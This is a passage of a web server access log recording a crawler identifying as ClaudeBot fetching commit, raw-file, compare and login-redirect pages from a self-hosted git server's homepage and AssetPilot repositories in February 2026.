-[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 216.73.216.188] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 453503] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11669] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 90053] [Gzip 12.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 216.73.216.188] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 216.73.216.188] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 216.73.216.188] [Length 11014] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fnormalizer" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13913] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12805] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13899] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11906] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom4.png" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14702] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.1" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt-requests_access.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 90159] [Gzip 12.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom5.png" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14693] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.5" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 14313] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom4.png" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21822] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md?display=rendered" [Client 216.73.216.188] [Length 13438] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr 